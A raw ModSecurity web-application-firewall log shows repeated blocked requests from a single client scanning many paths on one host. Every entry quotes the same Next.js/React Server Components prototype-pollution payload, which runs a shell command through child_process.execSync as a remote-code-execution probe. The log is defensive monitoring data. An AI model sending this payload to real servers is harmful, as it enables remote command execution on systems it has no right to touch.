"(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/fr"] [unique_id "aaZAcNsyBa6FPxjfniwseQAAAEc"] [Tue Mar 03 03:59:12.408485 2026] [:error] [pid 21862:tid 21927] [client 172.94.9.249:47562] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/me"] [unique_id "aaZAcPh_lrWoDSo4I3RnwwAAAJA"] [Tue Mar 03 03:59:12.410431 2026] [:error] [pid 21862:tid 21898] [client 172.94.9.249:47526] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/callback"] [unique_id "aaZAcPh_lrWoDSo4I3RnxAAAAIE"] [Tue Mar 03 03:59:12.410983 2026] [:error] [pid 21979:tid 21983] [client 172.94.9.249:47512] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/feed"] [unique_id "aaZAcP2xhCLtpShpTOoyoQAAAMI"] [Tue Mar 03 03:59:12.437277 2026] [:error] [pid 21979:tid 21982] [client 172.94.9.249:47572] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signout"] [unique_id "aaZAcP2xhCLtpShpTOoyogAAAME"] [Tue Mar 03 03:59:12.437446 2026] [:error] [pid 21862:tid 21937] [client 172.94.9.249:47508] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/de"] [unique_id "aaZAcPh_lrWoDSo4I3RnxQAAAJQ"] [Tue Mar 03 03:59:12.437868 2026] [:error] [pid 21979:tid 21986] [client 172.94.9.249:47546] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/providers"] [unique_id "aaZAcP2xhCLtpShpTOoyowAAAMU"] [Tue Mar 03 03:59:12.438480 2026] [:error] [pid 21861:tid 21905] [client 172.94.9.249:47514] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/config"] [unique_id "aaZAcNsyBa6FPxjfniwsegAAAEg"] [Tue Mar 03 03:59:12.438588 2026] [:error] [pid 21979:tid 22004] [client 172.94.9.249:47536] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/csrf"] [unique_id "aaZAcP2xhCLtpShpTOoypAAAANc"] [Tue Mar 03 03:59:12.440118 2026] [:error] [pid 21979:tid 21990] [client 172.94.9.249:47502] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/pt"] [unique_id "aaZAcP2xhCLtpShpTOoypQAAAMk"] [Tue Mar 03 03:59:12.440741 2026] [:error] [pid 21862:tid 21902] [client 172.94.9.249:47526] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/settings"] [unique_id "aaZAcPh_lrWoDSo4I3RnxgAAAIM"] [Tue Mar 03 03:59:12.445232 2026] [:error] [pid 21862:tid 21912] [client 172.94.9.249:47562] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/it"] [unique_id "aaZAcPh_lrWoDSo4I3RnxwAAAIg"] [Tue Mar 03 03:59:12.448021 2026] [:error] [pid 21979:tid 21981] [client 172.94.9.249:47512] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/auth"] [unique_id "aaZAcP2xhCLtpShpTOoypgAAAMA"] [Tue Mar 03 03:59:12.474434 2026] [:error] [pid 21979:tid 21990] [client 172.94.9.249:47536] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/upload"] [unique_id "aaZAcP2xhCLtpShpTOoypwAAAMk"] [Tue Mar 03 03:59:12.474430 2026] [:error] [pid 21861:tid 21897] [client 172.94.9.249:47514] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/auth/login"] [unique_id "aaZAcNsyBa6FPxjfniwsewAAAEQ"] [Tue Mar 03 03:59:12.477528 2026] [:error] [pid 21862:tid 21902] [client 172.94.9.249:47508] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/nl"] [unique_id "aaZAcPh_lrWoDSo4I3RnyAAAAIM"] [Tue Mar 03 03:59:12.477681 2026] [:error] [pid 21979:tid 21999] [client 172.94.9.249:47572] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/auth/callback"] [unique_id "aaZAcP2xhCLtpShpTOoyqQAAANI"] [Tue Mar 03 03:59:12.477681 2026] [:error] [pid 21979:tid 21985] [client 172.94.9.249:47546] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/payments"] [unique_id "aaZAcP2xhCLtpShpTOoyqAAAAMQ"] [Tue Mar 03 03:59:12.480121 2026] [:error] [pid 21862:tid 21912] [client 172.94.9.249:47562] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/stripe"] [unique_id "aaZAcPh_lrWoDSo4I3RnyQAAAIg"] [Tue Mar 03 03:59:12.481634 2026] [:error] [pid 21979:tid 21990] [client 172.94.9.249:47512] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at 